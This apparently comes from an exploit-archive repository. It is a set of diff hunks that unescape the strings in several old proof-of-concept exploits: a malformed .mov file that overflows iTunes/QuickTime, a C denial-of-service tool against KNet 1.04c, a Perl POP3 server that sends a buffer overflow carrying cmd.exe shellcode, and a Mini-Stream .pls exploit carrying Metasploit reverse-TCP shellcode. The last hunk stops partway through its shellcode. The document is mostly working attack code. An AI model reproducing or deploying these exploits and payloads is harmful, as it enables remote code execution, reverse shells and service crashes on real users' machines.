QuickTime contains a rich set of developer APIs for handling almost any audio, video and media task.
|
||||
Easily make your application multimedia-enabled with QuickTime.\"
|
||||
Easily make your application multimedia-enabled with QuickTime."
|
||||
|
||||
=======
|
||||
|
||||
|
@ -41,13 +41,13 @@ Quicktime & itunes fails to handle long arguments on a .mov file.
|
|||
Quicktime is compiled with the /GS cookie on , so the bug get handled with an exit code :
|
||||
c0000409
|
||||
but ...
|
||||
Itunes doesn\'t seems to be compiled with the /GS flag, so we get some code execution possible via Itunes.
|
||||
The PoC give\'s us full control over EAX & EDI
|
||||
Itunes doesn't seems to be compiled with the /GS flag, so we get some code execution possible via Itunes.
|
||||
The PoC give's us full control over EAX & EDI
|
||||
Itunes call unsafely the Quicktime function to play the .mov, so we can trigger a possible code execution
|
||||
via this unsafe call to quicktime héhéhé :)
|
||||
The only problem, is the lengh of the buffer overflowed :(
|
||||
erf ... 49 bytes, less the 8 bytes controlling the EDI & EAX registers so 41.
|
||||
i\'ve tryed to find a way to fill some buffer in the .mov to get some code exec working on this poc,
|
||||
i've tryed to find a way to fill some buffer in the .mov to get some code exec working on this poc,
|
||||
but out of luck, i guess someone will maybe be able to do some magic tricks :)
|
||||
|
||||
|
||||
|
@ -62,19 +62,19 @@ but out of luck, i guess someone will maybe be able to do some magic tricks :)
|
|||
use strict;
|
||||
|
||||
my $movfile =
|
||||
\"\\x00\\x00\\x00\\x7d\\x6d\\x6f\\x6f\\x76\\x00\\x00\\x00\\x75\\x72\\x6d\\x72\\x61\\x00\\x00\\x00\\x6d\".
|
||||
\"\\x72\\x6d\\x64\\x61\\x00\\x00\\x00\\x55\\x72\\x64\\x72\\x66\\x00\\x00\\x00\\x00\\x75\\x72\\x6c\\x20\".
|
||||
\"\\x00\\x00\\x00\\x41\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x32\\x37\\x2e\\x30\\x2e\\x30\\x2e\\x31\".
|
||||
\"\\x2f\\x74\\x65\\x73\\x74\\x2e\\x6d\\x6f\\x76\\x00\\x00\\x00\\x00\\x10\\x72\\x6d\\x64\\x72\\x00\\x00\".
|
||||
\"\\x00\\x00\\x00\\x00\\x05\\x78\".
|
||||
\"\\x41\\x42\\x43\\x44\". #EDI here
|
||||
\"\\x61\\x62\\x63\\x64\". #EAX here
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\".
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x44\\x44\\x44\\x44\\x41\\x41\\x43\\x43\".
|
||||
\"\\x43\\x41\\x41\\x41\\x42\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";
|
||||
"\x00\x00\x00\x7d\x6d\x6f\x6f\x76\x00\x00\x00\x75\x72\x6d\x72\x61\x00\x00\x00\x6d".
|
||||
"\x72\x6d\x64\x61\x00\x00\x00\x55\x72\x64\x72\x66\x00\x00\x00\x00\x75\x72\x6c\x20".
|
||||
"\x00\x00\x00\x41\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31".
|
||||
"\x2f\x74\x65\x73\x74\x2e\x6d\x6f\x76\x00\x00\x00\x00\x10\x72\x6d\x64\x72\x00\x00".
|
||||
"\x00\x00\x00\x00\x05\x78".
|
||||
"\x41\x42\x43\x44". #EDI here
|
||||
"\x61\x62\x63\x64". #EAX here
|
||||
"\x41\x41\x41\x41\x41\x41".
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x44\x44\x44\x44\x41\x41\x43\x43".
|
||||
"\x43\x41\x41\x41\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
|
||||
|
||||
|
||||
open(out, \"> test.mov\");
|
||||
open(out, "> test.mov");
|
||||
binmode(out);
|
||||
print (out $movfile);
|
||||
close(out);
|
||||
|
|
|
@ -11,7 +11,7 @@
|
|||
|
||||
-=[+] Application: Knet
|
||||
-=[+] Version: 1.04c
|
||||
-=[+] Vendor\'s URL: www.stormystudios.com
|
||||
-=[+] Vendor's URL: www.stormystudios.com
|
||||
-=[+] Platform: Windows
|
||||
-=[+] Bug type: Buffer overflow
|
||||
-=[+] Exploitation: Remote
|
||||
|
@ -68,27 +68,27 @@ if(argc < 3 ) {
|
|||
help(argv[0]);
|
||||
exit(0);
|
||||
}
|
||||
printf(\"\\n\\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\\n\");
|
||||
printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
|
||||
he = gethostbyname(argv[1]);
|
||||
sockfd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
request = (char *) malloc(12344);
|
||||
trg.sin_family = AF_INET;
|
||||
trg.sin_port = htons(atoi(argv[2]));
|
||||
trg.sin_addr = *((struct in_addr *) he->h_addr);
|
||||
memset(&(trg.sin_zero), \'\\0\', 8);
|
||||
printf(\"\\n\\nConnecting to target \\t...\");
|
||||
memset(&(trg.sin_zero), '\0', 8);
|
||||
printf("\n\nConnecting to target \t...");
|
||||
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
|
||||
if(rc==0)
|
||||
{
|
||||
printf(\"[Done]\\nBuilding evil buffer\\t...\");
|
||||
printf("[Done]\nBuilding evil buffer\t...");
|
||||
memset(evilbuf,90,1023);
|
||||
printf(\"[Done]\\nSending evil request \\t...\");
|
||||
sprintf(request,\"GET %s \\n\\r\\n\\r\",evilbuf);
|
||||
printf("[Done]\nSending evil request \t...");
|
||||
sprintf(request,"GET %s \n\r\n\r",evilbuf);
|
||||
send(sockfd,request,strlen(request),0);
|
||||
printf(\"[Done]\\n\\n[Finished] Check the server now\\n\");
|
||||
printf("[Done]\n\n[Finished] Check the server now\n");
|
||||
}
|
||||
else
|
||||
printf(\"[Fail] -> Unable to connect\\n\\n\");
|
||||
printf("[Fail] -> Unable to connect\n\n");
|
||||
close(sockfd);
|
||||
return 0;
|
||||
|
||||
|
@ -96,10 +96,10 @@ return 0;
|
|||
|
||||
void help(char *program_name) {
|
||||
|
||||
printf(\"\\n\\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\\n\");
|
||||
printf(\"\\t-=[ ]=-\\n\");
|
||||
printf(\"\\t-=[ Coded by ders -/www.x0n3-h4ck.org\\\\- ]=-\\n\\n\");
|
||||
printf(\"Usage: %s <Host> <Port>\\n\",program_name);
|
||||
printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
|
||||
printf("\t-=[ ]=-\n");
|
||||
printf("\t-=[ Coded by ders -/www.x0n3-h4ck.org\\- ]=-\n\n");
|
||||
printf("Usage: %s <Host> <Port>\n",program_name);
|
||||
}
|
||||
|
||||
// milw0rm.com [2005-02-25]
|
|
@ -8,7 +8,7 @@ Exploitation: remote BoF
|
|||
|
||||
Date: 2009-10-06
|
||||
|
||||
Author: Francis Provencher (Protek Research Lab\'s)
|
||||
Author: Francis Provencher (Protek Research Lab's)
|
||||
|
||||
Special Thanks to: M Jeremy Brown
|
||||
|
||||
|
@ -65,25 +65,25 @@ $port = 110;
|
|||
|
||||
# Simple cmd.exe
|
||||
|
||||
$sc2 = \"\\xB8\\xFF\\xEF\\xFF\\xFF\\xF7\\xD0\\x2B\\xE0\\x55\\x8B\\xEC\" .
|
||||
\"\\x33\\xFF\\x57\\x83\\xEC\\x04\\xC6\\x45\\xF8\\x63\\xC6\\x45\" .
|
||||
\"\\xF9\\x6D\\xC6\\x45\\xFA\\x64\\xC6\\x45\\xFB\\x2E\\xC6\\x45\" .
|
||||
\"\\xFC\\x65\\xC6\\x45\\xFD\\x78\\xC6\\x45\\xFE\\x65\\x8D\\x45\" .
|
||||
\"\\xF8\\x50\\xBB\\xC7\\x93\\xBF\\x77\\xFF\\xD3\";
|
||||
$sc2 = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" .
|
||||
"\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" .
|
||||
"\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" .
|
||||
"\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" .
|
||||
"\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
|
||||
|
||||
|
||||
$serv = IO::Socket::INET->new(Proto=>\'tcp\',
|
||||
$serv = IO::Socket::INET->new(Proto=>'tcp',
|
||||
LocalPort=>$port,
|
||||
Listen=>1)
|
||||
or die \"Error: listen($port)\\n\";
|
||||
or die "Error: listen($port)\n";
|
||||
|
||||
$cli = $serv->accept() or die \"Error: accept()\\n\";
|
||||
$cli = $serv->accept() or die "Error: accept()\n";
|
||||
|
||||
$retaddr = pack(\'l\', $ret);
|
||||
$junk = \"A\" x 709;
|
||||
$retaddr = pack('l', $ret);
|
||||
$junk = "A" x 709;
|
||||
|
||||
|
||||
$payload = \"-ERR \" . $junk . $retaddr . \"\\x90\" x 1 . $sc2 . \"\\r\\n\"; # 714 to overwrite EIP
|
||||
$payload = "-ERR " . $junk . $retaddr . "\x90" x 1 . $sc2 . "\r\n"; # 714 to overwrite EIP
|
||||
|
||||
$cli->send($payload);
|
||||
|
||||
|
|
|
@ -11,63 +11,63 @@
|
|||
# Downloadable from: http://mini-stream.net/
|
||||
# Tested against WinXP SP2 and SP3 - English
|
||||
|
||||
outputfile=\\\\\\\"astley.pls\\\\\\\"
|
||||
outputfile="astley.pls"
|
||||
|
||||
|
||||
shellcode=\\\\\\\"\\\\\\\\x44\\\\\\\"*17403
|
||||
#shellcode+=\\\\\\\"\\\\\\\\xed\\\\\\\\x1e\\\\\\\\x94\\\\\\\\x7c\\\\\\\" # JMP ESP - SHELL32.dll Win XP SP2
|
||||
shellcode+=\\\\\\\"\\\\\\\\x53\\\\\\\\x93\\\\\\\\x42\\\\\\\\x7e\\\\\\\" # JMP ESP - USER32.dll Win XP SP3
|
||||
shellcode+=\\\\\\\"CAFE\\\\\\\"*8 # 32 Byte NOP Sled
|
||||
shellcode="\x44"*17403
|
||||
#shellcode+="\xed\x1e\x94\x7c" # JMP ESP - SHELL32.dll Win XP SP2
|
||||
shellcode+="\x53\x93\x42\x7e" # JMP ESP - USER32.dll Win XP SP3
|
||||
shellcode+="CAFE"*8 # 32 Byte NOP Sled
|
||||
# msfpayload windows/shell_reverse_tcp LHOST=172.16.77.218 LPORT=443 R | msfencode -e x86/alpha_upper -t c
|
||||
shellcode+=(\\\\\\\"\\\\\\\\x89\\\\\\\\xe5\\\\\\\\xda\\\\\\\\xd6\\\\\\\\xd9\\\\\\\\x75\\\\\\\\xf4\\\\\\\\x58\\\\\\\\x50\\\\\\\\x59\\\\\\\\x49\\\\\\\\x49\\\\\\\\x49\\\\\\\\x49\\\\\\\\x43\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x51\\\\\\\\x5a\\\\\\\\x56\\\\\\\\x54\\\\\\\\x58\\\\\\\\x33\\\\\\\\x30\\\\\\\\x56\\\\\\\\x58\\\\\\\\x34\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x41\\\\\\\\x50\\\\\\\\x30\\\\\\\\x41\\\\\\\\x33\\\\\\\\x48\\\\\\\\x48\\\\\\\\x30\\\\\\\\x41\\\\\\\\x30\\\\\\\\x30\\\\\\\\x41\\\\\\\\x42\\\\\\\\x41\\\\\\\\x41\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x42\\\\\\\\x54\\\\\\\\x41\\\\\\\\x41\\\\\\\\x51\\\\\\\\x32\\\\\\\\x41\\\\\\\\x42\\\\\\\\x32\\\\\\\\x42\\\\\\\\x42\\\\\\\\x30\\\\\\\\x42\\\\\\\\x42\\\\\\\\x58\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x50\\\\\\\\x38\\\\\\\\x41\\\\\\\\x43\\\\\\\\x4a\\\\\\\\x4a\\\\\\\\x49\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x4d\\\\\\\\x38\\\\\\\\x4d\\\\\\\\x59\\\\\\\\x45\\\\\\\\x50\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x43\\\\\\\\x30\\\\\\\\x45\\\\\\\\x50\\\\\\\\x43\\\\\\\\x50\\\\\\\\x4d\\\\\\\\x59\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x46\\\\\\\\x51\\\\\\\\x48\\\\\\\\x52\\\\\\\\x42\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x52\\\\\\\\x50\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x52\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4c\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x50\\\\\\\\x52\\\\\\\\x45\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x42\\\\\\\\x51\\\\\\\\x38\\\\\\\\x44\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x37\\\\\\\\x51\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x5a\\\\\\\\x51\\\\\\\\x36\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x30\\\\\\\\x4e\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x4c\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x43\\\\\\\\x51\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x44\\\\\\\\x42\\\\\\\\x46\\\\\\\\x4c\\\\\\\\x51\\\\\\\\x30\\\\\\\\x4f\\\\\\\\x31\\\\\\\\x48\\\\\\\\x4f\\\\\\\\x44\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4d\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x4d\\\\\\\\x32\\\\\\\\x4a\\\\\\\\x50\\\\\\\\x46\\\\\\\\x32\\\\\\\\x46\\\\\\\\x37\\\\\\\\x4c\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x51\\\\\\\\x42\\\\\\\\x42\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x42\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4e\\\\\\\\x30\\\\\\\\x4c\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4b\\\\\\\\x47\\\\\\\\x30\\\\\\\\x42\\\\\\\\x58\\\\\\\\x4d\\\\\\\\x55\\\\\\\\x49\\\\\\\\x50\\\\\\\\x44\\\\\\\\x34\\\\\\\\x50\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x51\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4e\\\\\\\\x30\\\\\\\\x46\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x48\\\\\\\\x45\\\\\\\\x48\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x58\\\\\\\\x47\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x50\\\\\\\\x45\\\\\\\\x51\\\\\\\\x48\\\\\\\\x53\\\\\\\\x4a\\\\\\\\x43\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x39\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x47\\\\\\\\x44\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4e\\\\\\\\x36\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x30\\\\\\\\x4e\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x4f\\\\\\\\x31\\\\\\\\x48\\\\\\\\x4f\\\\\\\\x44\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x46\\\\\\\\x58\\\\\\\\x4d\\\\\\\\x30\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x44\\\\\\\\x35\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x45\\\\\\\\x53\\\\\\\\x43\\\\\\\\x4d\\\\\\\\x4b\\\\\\\\x48\\\\\\\\x47\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x4d\\\\\\\\x46\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x44\\\\\\\\x42\\\\\\\\x55\\\\\\\\x4b\\\\\\\\x52\\\\\\\\x50\\\\\\\\x58\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x48\\\\\\\\x47\\\\\\\\x54\\\\\\\\x43\\\\\\\\x31\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x49\\\\\\\\x43\\\\\\\\x45\\\\\\\\x36\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x50\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x48\\\\\\\\x45\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x43\\\\\\\\x31\\\\\\\\x49\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x34\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4e\\\\\\\\x30\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x50\\\\\\\\x44\\\\\\\\x46\\\\\\\\x44\\\\\\\\x46\\\\\\\\x44\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x31\\\\\\\\x46\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x39\\\\\\\\x50\\\\\\\\x5a\\\\\\\\x50\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x51\\\\\\\\x48\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x51\\\\\\\\x4a\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x52\\\\\\\\x4a\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x38\\\\\\\\x50\\\\\\\\x33\\\\\\\\x50\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x32\\\\\\\\x45\\\\\\\\x50\\\\\\\\x43\\\\\\\\x30\\\\\\\\x42\\\\\\\\x48\\\\\\\\x43\\\\\\\\x47\\\\\\\\x43\\\\\\\\x43\\\\\\\\x50\\\\\\\\x32\\\\\\\\x51\\\\\\\\x4f\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x51\\\\\\\\x44\\\\\\\\x42\\\\\\\\x48\\\\\\\\x50\\\\\\\\x4c\\\\\\\\x43\\\\\\\\x47\\\\\\\\x46\\\\\\\\x46\\\\\\\\x43\\\\\\\\x37\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x48\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x55\\\\\\\\x4e\\\\\\\\x58\\\\\\\\x4a\\\\\\\\x30\\\\\\\\x45\\\\\\\\x51\\\\\\\\x45\\\\\\\\x50\\\\\\\\x45\\\\\\\\x50\\\\\\\\x47\\\\\\\\x59\\\\\\\\x48\\\\\\\\x44\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x46\\\\\\\\x34\\\\\\\\x46\\\\\\\\x30\\\\\\\\x43\\\\\\\\x58\\\\\\\\x47\\\\\\\\x59\\\\\\\\x4b\\\\\\\\x30\\\\\\\\x42\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x50\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x45\\\\\\\\x46\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x46\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x47\\\\\\\\x30\\\\\\\\x46\\\\\\\\x30\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x47\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x45\\\\\\\\x38\\\\\\\\x4a\\\\\\\\x4a\\\\\\\\x44\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x55\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x49\\\\\\\\x57\\\\\\\\x42\\\\\\\\x48\\\\\\\\x4e\\\\\\\\x4c\\\\\\\\x42\\\\\\\\x30\\\\\\\\x50\\\\\\\\x4d\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x48\\\\\\\\x5a\\\\\\\\x42\\\\\\\\x48\\\\\\\\x45\\\\\\\\x52\\\\\\\\x45\\\\\\\\x50\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4d\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x36\\\\\\\\x42\\\\\\\\x4a\\\\\\\\x44\\\\\\\\x50\\\\\\\\x50\\\\\\\\x56\\\\\\\\x51\\\\\\\\x47\\\\\\\\x43\\\\\\\\x58\\\\\\\\x4c\\\\\\\\x59\\\\\\\\x49\\\\\\\\x35\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x42\\\\\\\\x54\\\\\\\\x45\\\\\\\\x31\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x43\\\\\\\\x58\\\\\\\\x42\\\\\\\\x43\\\\\\\\x42\\\\\\\\x4d\\\\\\\\x42\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x44\\\\\\\\x45\\\\\\\\x50\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4b\\\\\\\\x53\\\\\\\\x51\\\\\\\\x47\\\\\\\\x46\\\\\\\\x37\\\\\\\\x50\\\\\\\\x57\\\\\\\\x46\\\\\\\\x51\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4b\\\\\\\\x46\\\\\\\\x43\\\\\\\\x5a\\\\\\\\x44\\\\\\\\x52\\\\\\\\x50\\\\\\\\x59\\\\\\\\x50\\\\\\\\x56\\\\\\\\x4a\\\\\\\\x42\\\\\\\\x4b\\\\\\\\x4d\\\\\\\\x42\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x46\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x47\\\\\\\\x34\\\\\\\\x46\\\\\\\\x44\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x45\\\\\\\\x51\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4c\\\\\\\\x4d\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x47\\\\\\\\x34\\\\\\\\x51\\\\\\\\x34\\\\\\\\x42\\\\\\\\x30\\\\\\\\x48\\\\\\\\x46\\\\\\\\x45\\\\\\\\x50\\\\\\\\x50\\\\\\\\x44\\\\\\\\x51\\\\\\\\x44\\\\\\\\x50\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x50\\\\\\\\x46\\\\\\\\x36\\\\\\\\x50\\\\\\\\x56\\\\\\\\x46\\\\\\\\x36\\\\\\\\x47\\\\\\\\x36\\\\\\\\x51\\\\\\\\x46\\\\\\\\x50\\\\\\\\x4e\\\\\\\\x50\\\\\\\\x56\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x46\\\\\\\\x36\\\\\\\\x46\\\\\\\\x33\\\\\\\\x51\\\\\\\\x46\\\\\\\\x42\\\\\\\\x48\\\\\\\\x43\\\\\\\\x49\\\\\\\\x48\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x4f\\\\\\\\x4d\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x56\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x55\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4d\\\\\\\\x30\\\\\\\\x50\\\\\\\\x4e\\\\\\\\x51\\\\\\\\x46\\\\\\\\x47\\\\\\\\x36\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x30\\\\\\\\x43\\\\\\\\x58\\\\\\\\x45\\\\\\\\x58\\\\\\\\x4b\\\\\\\\x37\\\\\\\\x45\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x30\\\\\\\\x4b\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x45\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x30\\\\\\\\x4f\\\\\\\\x45\\\\\\\\x4f\\\\\\\\x52\\\\\\\\x50\\\\\\\\x56\\\\\\\\x42\\\\\\\\x48\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x49\\\\\\\\x36\\\\\\\\x4c\\\\\\\\x55\\\\\\\\x4f\\\\\\\\x4d\\\\\\\\x4d\\\\\\\\x4d\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x43\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x36\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x44\\\\\\\\x4a\\\\\\\\x4d\\\\\\\\x50\\\\\\\\x4b\\\\\\\\x4b\\\\\\\\x4d\\\\\\\\x30\\\\\\\\x43\\\\\\\\x45\\\\\\\\x45\\\\\\\\x55\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x47\\\\\\\\x44\\\\\\\\x53\\\\\\\\x44\\\\\\\\x32\\\\\\\\x42\\\\\\\\x4f\\\\\\\\x42\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x50\\\\\\\\x46\\\\\\\"
|
||||
\\\\\\\"\\\\\\\\x33\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x44\\\\\\\\x4a\\\\\\\\x41\\\\\\\\x41\\\\\\\")
|
||||
shellcode+=("\x89\xe5\xda\xd6\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
|
||||
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
|
||||
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
|
||||
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
|
||||
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4d\x59\x45\x50"
|
||||
"\x43\x30\x45\x50\x43\x50\x4d\x59\x4a\x45\x46\x51\x48\x52\x42"
|
||||
"\x44\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x50\x52\x44\x4c\x4c\x4b"
|
||||
"\x50\x52\x45\x44\x4c\x4b\x43\x42\x51\x38\x44\x4f\x48\x37\x51"
|
||||
"\x5a\x51\x36\x46\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
|
||||
"\x43\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x4f\x31\x48\x4f\x44"
|
||||
"\x4d\x43\x31\x4f\x37\x4d\x32\x4a\x50\x46\x32\x46\x37\x4c\x4b"
|
||||
"\x51\x42\x42\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c"
|
||||
"\x4b\x47\x30\x42\x58\x4d\x55\x49\x50\x44\x34\x50\x4a\x45\x51"
|
||||
"\x4e\x30\x46\x30\x4c\x4b\x50\x48\x45\x48\x4c\x4b\x50\x58\x47"
|
||||
"\x50\x45\x51\x48\x53\x4a\x43\x47\x4c\x47\x39\x4c\x4b\x47\x44"
|
||||
"\x4c\x4b\x43\x31\x4e\x36\x46\x51\x4b\x4f\x50\x31\x4f\x30\x4e"
|
||||
"\x4c\x4f\x31\x48\x4f\x44\x4d\x45\x51\x4f\x37\x46\x58\x4d\x30"
|
||||
"\x44\x35\x4b\x44\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46"
|
||||
"\x44\x42\x55\x4b\x52\x50\x58\x4c\x4b\x51\x48\x47\x54\x43\x31"
|
||||
"\x49\x43\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45"
|
||||
"\x4c\x43\x31\x49\x43\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
|
||||
"\x4c\x49\x50\x44\x46\x44\x46\x44\x51\x4b\x51\x4b\x45\x31\x46"
|
||||
"\x39\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a"
|
||||
"\x4c\x4b\x44\x52\x4a\x4b\x4c\x46\x51\x4d\x45\x38\x50\x33\x50"
|
||||
"\x32\x45\x50\x43\x30\x42\x48\x43\x47\x43\x43\x50\x32\x51\x4f"
|
||||
